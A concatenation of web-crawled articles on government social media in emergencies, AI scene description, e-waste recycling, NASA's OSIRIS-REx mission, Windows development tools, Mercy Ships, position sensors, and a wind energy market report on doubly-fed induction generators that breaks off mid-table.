metrics and purchasing standards for efficiency of IT equipment within these companies." Check out eWEEK.com's for the latest news, views and analysis on servers, switches and networking protocols for the enterprise and small businesses.
<urn:uuid:d9a6abeb-138f-402d-8c8f-4aa2cf9d3760>
CC-MAIN-2017-09
http://www.cioinsight.com/print/c/a/Past-News/Data-Center-Power-Consumption-on-the-Rise-Report-Shows
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00244-ip-10-171-10-108.ec2.internal.warc.gz
en
0.933656
718
2.5625
3
Social media is changing the way government communicates with its citizens. A 2011 study by the Fels Institute of Government at the University of Pennsylvania found that 90 percent of cities and counties had established a presence on social networking channels such as Twitter and Facebook. In the intervening years, there has been a steady stream of reports about others working to close the gap. Cities and counties have used social media to broaden transparency, increase citizen engagement and feedback, and improve public perception of what government does. As important as transparency and perception are, these somewhat intangible benefits are sometimes not enough to justify the investment to pursue anything more than a placeholder in social media. The ability to save lives changes everything, including thinking about the return on investment for social media in government. There have been three headline-grabbing examples in the last year. During Hurricane Sandy, a determined social media manager effectively transformed the New York Fire Department’s Twitter account -- @FDNY – from a source of safety tips to a hub for coordinating emergency response when phone lines were down and people couldn’t get through to 911 or 311. It also helped squash rumors circulating after the storm. Twitter also quickly became the most effective channel for the Boston Police Department to get the word out when terror struck the Boston Marathon last May. Fueled by national media coverage, the follower count for the @bostonpolice Twitter account surged from an already impressive 50,000 to an extraordinary 300,000, serving as became a beacon of clarity 140 characters at a time in a noisy and error-dilled chacophony. As with Sandy, @bostonpolice was used to dispell false rumors in the hours after the bombing. It was also used to help ensure officer safety as out-of-town news crews descended on Boston, and announce important developments. In fact, the first official announcement that suspect Dzhokhar Tsarnaev had been captured was delivered as -- you guessed it -- a tweet. Like this story? If so, subscribe to Government Technology's daily newsletter. Every town experiences its share of emergency situations, whether it's a natural disaster or a crime that shakes the community. It is clear from the recent New York and Boston examples that in these types of situations, social media provides government with an incredibly powerful channel to squash rumors, disseminate official information and align community interests. A social networking presence, however, is only effective as its reach. A city or police Twitter account created as a placeholder is just that: a placeholder. It is not at all equipped to create the type of immediate response we saw in Boston. It is also unlikely that a dormant presence can be kickstarted quickly enough at the time of need. Most situations simply do not receive the type of attention and media coverage that gave the @bostonpolice Twitter account such an enormous boost. The reality is, when the situation arises, we must rely on the network and following we’ve already established across our social networking channels. That’s the urgency in rethinking government’s approach to social media. There is a hard ROI to be realized when communities are in crisis. The same is true for social media’s role in the early identification of public health concerns or even the mundane but important work of keeping traffic flowing after accidents and road closures. The time and effort put into promoting your social networking presence -- and building a truly engaged audience -- is not just for fun and games. Nor does it always have to drive business metrics such as page views or building awareness, or even participation in government programs. Rather, public officials must come to think of building out a social network as a down payment on establishing the most rapid, viral and open communications link you can possibly create with your citizens. The type of communications link that can save lives -- and it has. Your network keeps you safe and makes you strong ... if you have one. To be clear, the investment required to build a social media following is non-trivial: Moreover, there needs to be oversight to ensure consistent and appropriate messaging, especially as staff members outside of your traditional communications team speak on behalf of their agencies. And, of course, attention must be paid to legal policies and requirements such as employee conduct rules and record retention. Creating an active social media presence is a significant undertaking for government but, given the changing nature of emergency management and crime response, the investment in social can serve the larger public policy priorities of public safety and emergency preparedness. It’s not simply about likes and followers. It’s about being able to communicate with your citizens in the most effective way possible in a time of need. It’s about the potential to save lives. Anil Chawla is an experienced technologist and entrepreneur, with a proven track record of working with businesses to address challenges related to social media. He has over a decade of experience creating software products, and has focused the last four years developing social media technology. Mr. Chawla is the CEO of ArchiveSocial, which he founded to help government organizations navigate the important legal and regulatory challenges they face related to social media management.
<urn:uuid:6f8259a4-0df2-4cae-a8ab-c8bc8ec1e7db>
CC-MAIN-2017-09
http://www.govtech.com/internet/Industry-Perspective-Social-Media-is-Serious-Business-for-Government.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00244-ip-10-171-10-108.ec2.internal.warc.gz
en
0.953499
1,044
2.890625
3
Take a look at this new artificially intelligent natural language image processor from Google and Stanford: It was only recently that computer systems became smart enough to identify unknown objects in photographs. Even then, it has generally been limited to individual objects. Now, two separate teams of researchers at Google and Stanford University have created software able to describe entire scenes. This could lead to much better and more intelligent algorithms in the future. "A group of young people playing a game of frisbee." In the near term, computer vision systems that can discern the story in a picture will enable people to search photo or video archives and find highly specific images. Eventually, these advances will lead to robotic systems able to navigate unknown situations. Driverless cars would also be made safer. However, it also raises the prospect of even greater levels of government surveillance. What's the guess for near term? 1yr or 10?
<urn:uuid:08b2df31-9f38-4c1a-8d94-a1c599a08aae>
CC-MAIN-2017-09
https://ipvm.com/forums/video-surveillance/topics/natural-language-scene-processing-the-future-of-analytics
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00596-ip-10-171-10-108.ec2.internal.warc.gz
en
0.964629
182
3.390625
3
On Global Earth Day weekend, more than 248 tons (225 metric tonnes) of electronic waste were kept out of landfills during a huge, multi-national e-waste collection event. Recycling facilities and collection points in North America, Austria, Belgium, Germany, India, the Netherlands, South Africa, Sweden and the United Kingdom received the waste that was otherwise destined for landfills around the globe. This is how it should be every day of the year. The purpose of this Earth Day event was to promote awareness of the need to recycle electrical and electronic equipment, no matter where in the world you live. 472,985 pounds of e-waste were collected in North America from 25 Earth Day events. In other countries, events included beach cleanups, outreach and educational events, monetary donations to local schools for every kilogram collected, and more.
<urn:uuid:dcf37226-6e7c-4537-8165-ccebb208bf12>
CC-MAIN-2017-09
http://anythingit.com/blog/2012/06/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00540-ip-10-171-10-108.ec2.internal.warc.gz
en
0.956087
177
2.921875
3
NASA is less than a month away from launching a spacecraft designed to return a sample of an asteroid to Earth for the first time. Scientists are hoping the seven-year mission, set to launch on Sept. 8 from Cape Canaveral Air Force Station in Florida, will give them information about the makeup of the solar system, about life on Earth and the potential of life elsewhere in the universe, and about asteroids and how they could affect Earth. “This mission exemplifies our nation’s quest to boldly go and study our solar system and beyond to better understand the universe and our place in it,” said Geoff Yoder, acting associate administrator for NASA’s Science Mission Directorate. “NASA science is the greatest engine of scientific discovery on the planet and [this mission] embodies our directorate’s goal to innovate, explore, discover and inspire.” The spacecraft known as OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, Security-Regolith Explorer) is set to launch on top of an Atlas V 411 rocket. The spacecraft is expected to travel 1.2 billion miles and reach the near-Earth asteroid Bennu in 2018, and, while flying in formation with the asteroid, will begin making observations of it. The spacecraft will, for instance, track the asteroid's thermal emissions, which give scientists an idea of how the sun’s heat is affecting its trajectory. Osiris-REx also will look for natural satellites, measure its acceleration, map its surface and study its geological properties. The spacecraft then will map out potential sample sites. Osiris-REx will not, however, land on Bennu. Instead, it will draw close to it and use a robotic arm to reach out and release a five-second burst of nitrogen gas, kicking up loose rocks and soil that can then be captured by the spacecraft. The spacecraft will carry enough nitrogen to make three sample attempts. Scientists hope to collect between 2.1 ounces and 4.4 pounds of soil and rock samples. Osiris-REx is expected to leave the asteroid in March 2021 by firing its main engines to reach a speed of 716 mph. It is expected to return to Earth orbit in September 2023. The spacecraft would then jettison the capsule carrying the asteroid sample. Osiris-REx would remain in the Earth orbit, while the capsule makes its way down to the Utah desert on Sept. 24, 2023. The sample would be taken to the Johnson Space Center for analysis. Bennu, according to NASA, was likely formed by the rubble of an exploding star smashing into material in a nebula. Over the millions of years that it has traveled through space, the asteroid has been whittled down by the gravity of planets it’s passed. Because of its age, the asteroid is expected to contain materials that were present when the solar system was first formed and that may have had a role in the origin of life itself. By studying that material, scientists hope to get more information about the origin of the solar system and about life as we know it. This story, " NASA to send spacecraft on 1.2B-mile journey to asteroid" was originally published by Computerworld.
<urn:uuid:91b0f25b-1a0f-46f9-9c76-950924ef0ce8>
CC-MAIN-2017-09
http://www.itnews.com/article/3109105/space-technology/nasa-to-send-spacecraft-on-12b-mile-journey-to-asteroid.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00416-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947572
671
3.4375
3
Microsofts Mastery of Innovative Development Tools"> Developing a relationship Finally, theres the matter of applications.The key question, however, is what the application development space would look like if Windows had never emerged. When Microsoft started talking about Windows, Apple was a few years away from the release of its groundbreaking HyperCardbut it wasnt until 1990 that Windows 3.0 was actually useful, with another year before Visual Basic 1.0 made Windows development feasible for users. By 1991, NeXT Computer had introduced an object-oriented development platform; Apples HyperCard 2.0 was already a year old and proving a fertile environment for innovative applications. Will the launch of SQL Server 2005, Visual Studio 2005 and BizTalk Server 2005 be one of Microsofts last big launches? Click here to read more. Visual Basics model was a GUI with behaviors built behind it, while HyperCards was an extensible data structure with powerful but approachable GUI tools. The HyperCard model might have been a better choice for the baby-duck imprinting of a generation of programmers. HyperCard "stacks" could easily have become an approachable model for distributed platforms and concurrent processing engines, and there were several competing Windows and cross-platform development tools that resembled HyperCard by the time Visual Basic arrived. Visual Basic had the edge, though, in exploiting the Windows APIsand that was the advantage that mattered. If there had been no Windows, wed still be printing, wed still be plugging and playing, and wed still be developing applications. Windows was brilliantly positioned, however, so as to replace the problem of how to do things on PCs with the problem of how to do things on Windows. Thats a problem that Microsoft always solved better than anyone else. Peter Coffee can be reached at [email protected]. For reader response to this editorial, click here. Check out eWEEK.coms for Microsoft and Windows news, views and analysis. Its impossible to overstate the importance of Microsofts mastery and promotion of innovative development tools, plus ardent and effective courting of application developers, in achieving and maintaining the dominance of Windows.
<urn:uuid:e17e089a-f023-4bad-9a9b-c494ac01f5cc>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Windows/If-Windows-Had-Never-Happened/2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00116-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952186
440
2.671875
3
Charity uses hospital ships to bring medical services such as tumor removal to countries in the Caribbean and West Africa. Mercy Ships brings help and healing to poor nations around the world, according to Kelvin Burton, Mercy Ships chief technology officer. Founded in 1978, the organization depends on the volunteer efforts of doctors, dentists, nurses, teachers, cooks, seamen, engineers, community developers and others. Over the years, Burton said, Mercy Ships has: performed approximately 2 million services worth more than $250 million and has affected more than 2.5 million people; treated more than 300,000 people in village medical clinics; performed approximately 18,000 surgeries; performed approximately 110,000 dental treatments; and completed nearly 350 construction and agricultural projects. In addition, the Mercy Ships fleet has visited more than 500 ports in more than 50 developing nations and 17 developed nations. Click here to read the related story on how Mercy Ships is using Borlands JBuilder. "What we do is take our ... hospital ships to Third World situationsprimarily West Africa and the Caribbean in the last few years," said Burton. "The Caribbean being places like the Dominican Republic, Honduras, Belize, Nicaragua and Guatemala. And in West Africa, its been Benin, Togo and Sierra Leoneand most recently in Liberia." Burton said the United Nations pushed very hard for Mercy Ships to go to Liberia, and "we just sailed out of Monrovia to South Africa to do our annual refit of the ship, and then well be going back to Monrovia." Indeed, the most visible part of Mercy Ships efforts is the medical work the organization performs. "The surgeries we do are typically life-changing surgeries, like cataract removal, tumor removal, and various sorts of cleft lip and cleft palate surgeriesthings that are totally debilitating but dont take dramatic amounts of surgery to produce radical changes," Burton said. "So thats the focus of the surgery, and primarily because of the fact that it requires relatively short ward time and ward space is critical in these situations," Burton said. "We can help a whole lot more people if they dont have to spend three months recovering, and most of our patients can recover in a week." Meanwhile, although Burtons IT staff does not produce systems for the medical operations of the ships, he said, Mercy Ships is seeking a grant to enable his staff to develop applications that will better enable doctors on the ships to consult with specialists remotely on cases that might require outside consultation. Check out eWEEK.coms for the latest news, reviews and analysis in programming environments and developer tools.
<urn:uuid:fcb2ec44-4407-4cfd-9fe7-e216db58a4b0>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Application-Development/Mercy-Ships-Has-Helped-Millions
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00468-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95097
552
2.53125
3
Celebrating Our Military on Armed Forces Day 2014 / May 13, 2014 May 17 is Armed Forces Day in the U.S. The holiday is celebrated by many world nations to honor their militaries at various dates throughout the year, but the U.S. holiday was created in 1949 following the consolidation of the U.S. Military through the Department of Defense. This photo shows a Marine in the forest of Camp Geiger, N.C., during patrol week last year, a five-day training event that teaches infantry students basic offensive, defensive and patrolling techniques. This Marine is part of the Delta company, was the first in the Marines to fully integrate females into an entire training cycle. And the performance of Delta company was used to determine the future use of women in combat-related military jobs.
<urn:uuid:93caa260-fb79-47da-b132-c4c5650b3582>
CC-MAIN-2017-09
http://www.govtech.com/photos/Photo-of-the-Week-Celebrating-Our-Military-on-Armed-Forces-Day-2014.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00468-ip-10-171-10-108.ec2.internal.warc.gz
en
0.969964
165
2.828125
3
Global Position Sensor Market Research Report Sensors are usually classified on the basis of their applications. For example, sensor used for measurement of pressure is known as pressure sensor and sensor used for measurement of humidity is known as humidity sensor. A type of sensor used for measuring the distance travelled by an object in regard to its reference point is known as position sensor. It is actually a measurement of an object movement or displacement from reference point or the initial position. The motion of the object can be linear, angular or multi-axis. On the basis of motion, sensors can be classified as linear position sensor or angular position sensor. Sensor used to detect object movement in straight line is termed as linear position sensor and sensor used to detect angular movements are termed as angular position sensor or rotational sensor. Position sensor can be classified on the basis of their sensing principles in order to measure the displacement of an object such as potentiometric position sensor, capacitive position sensor, linear voltage differential transformer, magnetostrictive linear position sensor, eddy current based position sensor, hall effect based magnetic position sensor, fiber-optic position sensor and optical position sensor. Potentiometric Position Sensor This sensor utilizes resistive effect for sensing. The basic principle is just the resistive or conductive track. For measuring the displacement of an object, a wiper is joined to the object or part of object. This wiper is in contact with the track. Potentiometric position sensor is convenient to use and of low cost and low technology. The main disadvantage is wear as a result of moving parts. Other disadvantages are low accuracy and repeatability, and limited frequency response. The three main types of potentiometers c) Plastic film Linear Variable Differential Transformer This is a type of position sensor which is free from mechanical wear problems. It comes into the category of inductive type position sensor. It is based on the same principle as AC transformer which is a movement measuring device. This device is very useful to measure linear displacement. Eddy current sensor It is not used for the measurement of displacement or angular rotation. This type of sensor is used to detect any object’s presence in front or within close proximity. It is a non contact position sensor based on the use of magnetic field for detection. Linear and Rotary Position Sensor Market Linear and Rotary Position Sensor Market and transducers undergo mechanical displacement in proportion to the input signal resulting into electrical signal. They found their applications in machine tools, material handling, test equipment, robotics and more, Linear and Rotary Position Sensor Market are typically used for position measurement by detecting angular or straight movement of the object. Presence sensing Edges Presence sensing Edges and Presence sensing Mats adds up to total Position Sensor market. Submarkets of Presence sensing Edges are Machine safety. Key Questions Answered What are market estimates and forecasts; which of... Presence sensing Mats Presence sensing Mats and Presence sensing Edges adds up to total Linear displacement sensor Linear displacement sensor and Proximity Sensor, Linear Position Sensor Submarkets of this market are Servo and Magnetic Field Sensor. ...
<urn:uuid:a1dcf6ee-f370-46db-8fc4-c231073897a5>
CC-MAIN-2017-09
http://www.micromarketmonitor.com/market-report/position-sensor-reports-1538486253.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00589-ip-10-171-10-108.ec2.internal.warc.gz
en
0.89201
652
2.96875
3
This report presents a brief introduction to wind energy and technologies available for horizontal wind turbines. A detailed taxonomy for horizontal axis wind turbines is presented covering parts of the turbine, control systems, applications among others. A detailed landscape analysis of patent and non-patent literature is done with a focus on Doubly-fed Induction Generators (DFIG) used in the horizontal axis wind turbines for efficient power generation. The product information of major players in the market is also captured for Doubly-fed Induction Generators. The final section of the report covers the existing and future market predictions for wind energy-based power generation. - We have been using wind power at least since 5000 BC to propel sailboats and sailing ships, and architects have used wind-driven natural ventilation in buildings since similarly ancient times. The use of wind to provide mechanical power came later. - Harnessing renewable alternative energy is the ideal way to tackle the energy crisis, with due consideration given to environmental pollution, that looms large over the world. - Renewable energy is also called "clean energy" or "green power" because it doesn’t pollute the air or the water. Wind energy is one such renewable energy source that harnesses natural wind power. Click on Wind Energy Background to read more about wind energy. In order to overcome the problems associated with fixed speed wind turbine system and to maximize the wind energy capture, many new wind farms are employing variable speed wind energy conversion systems (WECS) with doubly-fed induction generator (DFIG). It is the most popular and widely used scheme for the wind generators due to its advantages. For variable-speed systems with limited variable-speed range, e.g. ±30% of synchronous speed, the doubly-fed induction generator(DFIG) can be an interesting solution. This is mainly due to the fact that the power electronic converter only has to handle a fraction (20-30%) of the total power as the converters are connected to the rotor and not to the stator. Therefore, the losses in the power electronic converter can be reduced, compared to a system where the converter has to handle the total power. The overall structure of wind power generation through DFIG as shown in the figure below. The History of Wind Energy To read about the History of Wind Energy, click here Global Wind Energy Market - In the year 2010, the wind capacity reached worldwide 196’630 Megawatt, after 159’050 MW in 2009, 120’903 MW in 2008, and 93’930 MW in 2007. - Wind power showed a growth rate of 23.6 %, the lowest growth since 2004 and the second lowest growth of the past decade. - For the first time in more than two decades, the market for new wind turbines was smaller than in the previous year and reached an overall size of 37’642 MW, after 38'312 MW in 2009. - All wind turbines installed by the end of 2010 worldwide can generate 430 Tera watt hours per annum, more than the total electricity demand of the United Kingdom, the sixth largest economy of the world, and equaling 2.5 % of the global electricity consumption. - In the year 2010, altogether 83 countries, one more than in 2009, used wind energy for electricity generation. 52 countries increased their total installed capacity, after 49 in the previous year. - The turnover of the wind sector worldwide reached 40 billion Euros (55 billion US$) in 2010, after 50 billion Euros (70 billion US$) in the year 2009. The decrease is due to lower prices for wind turbines and a shift towards China. - China became number one in total installed capacity and the center of the international wind industry, and added 18’928 Megawatt within one year, accounting for more than 50 % of the world market for new wind turbines. - The wind sector in 2010 employed 670’000 persons worldwide. - Nuclear disaster in Japan and oil spill in Gulf of Mexico will have long-term impact on the prospects of wind energy. Governments need to urgently reinforce their wind energy policies. - WWEA sees a global capacity of 600’000 Megawatt as possible by the year 2015 and more than 1’500’000 Megawatt by the year 2020. Source: World Wind Energy Report, 2010 Global Market Forecast - Global Wind Energy Outlook 2010, provides forecast under three different scenarios - Reference, Moderate and Advanced. - The Global Cumulative Wind Power Capacity is estimated to reach 572,733 MW by the year 2030, under the Reference Scenario - The Global Cumulative Wind Power Capacity is estimated to reach 1,777,550 MW by the year 2030, under the Moderate Scenario - The Global Cumulative Wind Power Capacity is estimated to reach 2,341,984 MW by the year 2030, under the Advanced Scenario - The following chart shows the Global Cumulative Wind Power Capacity Forecast,under the different scenarios: Source: Global Wind Energy Outlook 2010 Market Growth Rates - The growth rate is the relation between the new installed wind power capacity and the installed capacity of the previous year. - With 23.6 %, the year 2010 showed the second lowest growth rate of the last decade. - Before 2010, the annual growth rate had continued to increase since the year 2004, peaking in 2009 at 31.7%, the highest rate since 2001. - The highest growth rates of the year 2010 by country can be found in Romania, which increased its capacity by 40 times. - The second country with a growth rate of more than 100 % was Bulgaria (112%). - In the year 2009, four major wind markets had more than doubled their wind capacity: China, Mexico, Turkey, and Morocco. - Next to China, strong growth could be found mainly in Eastern European and South Eastern European countries: Romania, Bulgaria, Turkey, Lithuania, Poland, Hungary, Croatia and Cyprus, and Belgium. - Africa (with the exception of Egypt and Morocco) and Latin America (with the exception of Brazil), are again lagging behind the rest of the world in the commercial use of wind power. - The Top 10 countries by Growth Rate are shown in the figure listed below (only markets bigger than 200 MW have been considered): Geographical Market Distribution - China became number one in total installed capacity and the center of the international wind industry, and added 18'928 Megawatt within one year, accounting for more than 50 % of the world market for new wind turbines. - Major decrease in new installations can be observed in North America and the USA lost its number one position in total capacity to China. - Many Western European countries are showing stagnation, whereas there is strong growth in a number of Eastern European countries. - Germany keeps its number one position in Europe with 27'215 Megawatt, followed by Spain with 20'676 Megawatt. - The highest shares of wind power can be found in three European countries: Denmark (21.0%), Portugal (18.0 %) and Spain (16.0%). - Asia accounted for the largest share of new installations (54.6%), followed by Europe (27.0%) and North America (16.7 %). - Latin America (1.2%) and Africa (0.4%) still played only a marginal role in new installations. - Africa: North Africa represents still lion share of installed capacity, wind energy plays hardly a role yet in Sub-Sahara Africa. - Nuclear disaster in Japan and oil spill in Gulf of Mexico will have long-term impact on the prospects of wind energy. Governments need to urgently reinforce their wind energy policies. Source: World Wind Energy Report, 2010 The regional breakdowns for the period 2009-2030 has been provided for the following three scenarios: Note: To know more about the Forecast Scenarios click here Country-wise Market Distribution - In 2010, the Chinese wind market represented more than half of the world market for new wind turbines adding 18.9 GW, which equals a market share of 50.3%. - A sharp decrease in new capacity happened in the USA whose share in new wind turbines fell down to 14.9% (5.6 GW), after 25.9% or 9.9 GW in the year 2009. - Nine further countries could be seen as major markets, with turbine sales in a range between 0.5 and 1.5 GW: Germany, Spain, India, United Kingdom, France, Italy, Canada, Sweden and the Eastern European newcomer Romania. - Further, 12 markets for new turbines had a medium size between 100 and 500 MW: Turkey, Poland, Portugal, Belgium, Brazil, Denmark, Japan, Bulgaria, Greece, Egypt, Ireland, and Mexico. - By end of 2010, 20 countries had installations of more than 1 000 MW, compared with 17 countries by end of 2009 and 11 countries byend of 2005. - Worldwide, 39 countries had wind farms with a capacity of 100 Megawatt or more installed, compared with 35 countries one year ago, and 24 countries five years ago. - The top five countries (USA, China, Germany, Spain and India) represented 74.2% of the worldwide wind capacity, significantly more than 72.9 % in the year. - The USA and China together represented 43.2% of the global wind capacity (up from 38.4 % in 2009). - The newcomer on the list of countries using wind power commercially is a Mediterranean country, Cyprus, which for the first time installed a larger grid-connected wind farm, with 82 MW. Source: World Wind Energy Report, 2010 The top 10 countries by Total Installed Capacity for the year 2010, is illustrated in the chart below: To view the Top 10 countries by different other parameters for the year 2010, click on the links below: Wind Energy Outlook for China - 2011 & Beyond Despite its rapid and seemingly unhampered expansion, the Chinese wind power sector continues to face significant challenges, including issues surrounding grid access and integration, reliability of turbines and a coherent strategy for developing China’s offshore wind resource. These issues will be prominent during discussions around the twelfth Five-Year Plan, which will be passed in March 2011. According to the draft plan, this is expected to reflect the Chinese government’s continuous and reinforced commitment to wind power development, with national wind energy targets of 90 GW for 2015 and 200 GW for 2020. For a detailed country profile of China please visit this China Wind Energy Profile Link Wind Energy Main market developments in 2010 Today the Indian market is emerging as one of the major manufacturing hubs for wind turbines in Asia. Currently, seventeen manufacturers have an annual production capacity of 7,500 MW. According to the WISE, the annual wind turbine manufacturing capacity in India is likely to exceed 17,000 MW by 2013. The Indian market is expanding with the leading wind companies like Suzlon, Vestas, Enercon, RRB Energy and GE now being joined by new entrants like Gamesa, Siemens, and WinWinD, all vying for a greater market share. Suzlon, however, is still the market leader with a market share of over 50%. The Indian wind industry has not been significantly affected by the financial and economic crises. Even in the face of a global slowdown, the Indian annual wind power market has grown by almost 68%. However, it needs to be pointed out that the strong growth in 2010 might have been stimulated by developers taking advantage of the accelerated depreciation before this option is phased out. For a detailed country profile of India please visit this India Wind Energy Profile Link - Vestas leads the Global Market in the 2010 with a 12% market share according to Make Consulting, while BTM Consulting reports it to have a 14.8% market share. - According to Make Consulting, the global market share of Vestas has decreased from 19% in 2008, to 14.5% in 2009, to 12% in 2010. - According to BTM Consulting, the global market share of Vestas has changed from 19% in 2008, to 12% in 2009, to 14.8% in 2010. - According to Make Consulting, the global market share of GE Energy has decreased from 18% in 2008, to 12.5% in 2009, to 10% in 2010. - The market share of world no. 2 Sinovel, has been constantly increasing, from 5% in 2008 , to 9.3% in 2009, to 11% in 2010 - The top 5 companies have been occupying more than half of the Global Market Share from 2008 to 2010 The chart given below illustrates the Global Market Share Comparison of Major Wind Energy Companies for the period 2008-2010, as provided by two different agencies, Make Consulting and BTM Consulting: - While Vestas is the Global Leader, it is the leader in only one of Top 10 markets, which is 10th placed Sweden - But, Vestas is ranked 2nd in 5 of Top 10 markets - Sinovel, ranked 2nd globally, features only once in the Top 3 Companies list in the Top 10 markets, but scores globally because it leads the largest market China - The table given below illustrates the Top 3 players in Top 10 Wind Energy Markets of the world: |Market||MW||No. 1||No. 2||No. 3| |Source: BTM Consult - part of Navigant Consulting - March 2011| Source: BTM Consult Major Wind Turbine Suppliers |Turbine maker||Rotor blades||Gear boxes||Generators||Towers||Controllers| |Vestas||Vestas, LM||Bosch Rexroth, Hansen, Wingery, Moventas||Weier, Elin, ABB, LeroySomer||Vestas, NEG, DMI||Cotas (Vestas),| |GE energy||LM, Tecsis||Wingery, Bosch, Rexroth, Eickhoff, GE||Loher, GE||DMI, Omnical, SIAG||GE| |Gamesa||Gamesa, LM||Echesa (Gamesa), Winergy, Hansen||Indar (Gamesa), Cantarey||Gamesa||Ingelectric (Gamesa)| |Enercon||Enercon||Direct drive||Enercon||KGW, SAM||Enercon| |Siemens, LM||Winergy||ABB||Roug, KGW||Siemens, KK Electronic| |Suzlon||Suzlon||Hansen, Winergy|| Suzlon, |Suzlon||Suzlon, Mita Teknik| |Repower||LM||Winergy, Renk, Eickhoff||N/A||N/A||Mita Teknik, ReGuard| |Nordex||Nordex||Winergy, Eickhoff, Maag||Loher||Nordex, Omnical||Nordex, Mita Teknik| |Source: BTM Consult| Products of Top Companies |1||Vestas||V80||Rated Power: 2.0 MW, Frequency: 50 Hz/60 Hz, Number of Poles: 4-pole, Operating Temperature: -30°C to 40°| |2||Vestas||V90||Rated Power: 1.8/2.0 MW, Frequency : 50 Hz/60 Hz, Number of Poles : 4-pole(50 Hz)/6-pole(60 Hz), Operating Temperature: -30°C to 40°| |3||Vestas||V90 Offshore||Rated Power: 3.0 MW, Frequency: 50 Hz/60 Hz, Number of Poles: 4-pole, Operating Temperature: -30°C to 40°| |4||North Heavy Company||2 MW DFIG||Rated Power: 2.0 MW, Rated Voltage: 690V, Rated Current: 1670A, Frequency: 50Hz, Number of Poles : 4-pole, Rotor Rated Voltage: 1840V, Rotor Rated Current 670A, Rated Speed: 1660rpm; Power Speed Range: 520-1950 rpm, Insulation Class: H, Protection Class: IP54, Motor Temperature Rise =<95K| |5||Gamesa||G90||Rated Voltage: 690 V, Frequency: 50 Hz, Number of Poles: 4, Rotational Speed: 900:1,900 rpm (rated 1,680 rpm) (50Hz); Rated Stator Current: 1,500 A @ 690 V, Protection Class: IP 54, Power Factor(standard): 0.98 CAP - 0.96 IND at partial loads and 1 at nominal power, Power Factor(Optional): 0.95 CAP - 0.95 IND throughout the power range| |6||Nordex||N80||Rated Power: 2.5 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |7||Nordex||N90||Rated Power: 2.5 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |8||Nordex||N100||Rated Power: 2.4 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |9||Nordex||N117||Rated Power: 2.5 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |11||Xian Geoho Energy Technology||1.5MW DFIG||Rated Power: 1550KW, Rated Voltage: 690V, Rated Speed: 1755 r/min, Speed Range: 975~1970 r/min, Number of Poles: 4-pole, Stator Rated Voltage: 690V±10%, Stator Rated Current: 1115A; Rotor Rated Voltage: 320V, Rotor Rated Current: 430A, Winding Connection: Y / Y, Power Factor: 0.95(Lead) ~ 0.95Lag, Protection Class: IP54, Insulation Class: H, Work Mode: S1, Installation ModeI: M B3, Cooling Mode: Air cooling, Weight: 6950kg| |12||Tecowestinghouse||TW450XX (0.5-1 KW)||Rated Power: 0.5 -1 KW, Rated Voltage: 460/ 575/ 690 V, Frequency: 50/ 60 Hz, Number of Poles: 4/6, Ambient Temp.(°C): -40 to 50, Speed Range (% of Synch. Speed): 68% to 134%, Power Factor (Leading): -0.90 to +0.90 , Insulation Class: H/F, Efficiency: >= 96%| |13||Tecowestinghouse||TW500XX (1-2 KW)||Rated Power: 1-2 kW, Rated Voltage: 460/ 575/ 690 V, Frequency: 50/ 60 Hz, Number of Poles: 4/6, Ambient Temp.(°C): -40 to 50; Speed Range (% of Synch. Speed): 68 to 134%, Power Factor(Leading): -0.90 to +0.90, Insulation Class: H/F, Efficiency: >= 96%| |14||Tecowestinghouse||TW560XX (2-3 KW)||Rated Power: 2-3kW, Rated Voltage: 460/ 575/ 690 V, Frequency: 50/ 60 Hz, Number of Poles: 4/6, Ambient Temp(°C): -40 to 50, Speed Range(% of Synch. Speed): 68 to 134%, Power Factor(Leading): -0.90 to +0.90, Insulation Class: H/F, Efficiency: >= 96%.| |15||Acciona||AW1500||Rated Power: 1.5MW, Rated Voltage: 690 V, Frequency: 50 Hz, Number of Poles: 4, Rotational Speed: 900:1,900 rpm(rated 1,680 rpm) (50Hz), Rated Stator Current: 1,500 A @ 690 V, Protection Class: IP54, Power Factor(standard): 0.98 CAP - 0.96 IND at partial loads and 1 at nominal power, Power factor(optional): 0.95 CAP - 0.95 IND throughout the power range| |16||Acciona||AW3000||Rated Power: 3.0MW, Rated Voltage: 690 V, Frequency: 50 Hz, Number of Poles: 4, Rotational Speed: 900:1,900 rpm(rated 1,680 rpm) (50Hz), Rated Stator Current: 1,500 A @ 690 V, Protection Class: IP54, Power Factor(standard): 0.98 CAP - 0.96 IND at partial loads and 1 at nominal power, Power Factor (optional): 0.95 CAP - 0.95 IND throughout the power range| |17||General Electric||GE 1.5/2.5MW||Rated Power: 1.5/2.5 MW, Frequency(Hz): 50/60| IP Search & Analysis Doubly-fed Induction Generator: Search Strategy The present study on the IP activity in the area of horizontal axis wind turbines with focus on Doubly-fed Induction Generator (DFIG) is based on a search conducted on Thomson Innovation. |S. No.||Patent/Publication No.||Publication Date |1||US6278211||08/02/01||Sweo Edwin||Brush-less doubly-fed induction machines employing dual cage rotors| |2||US6954004||10/11/05||Spellman High Voltage Electron||Doubly fed 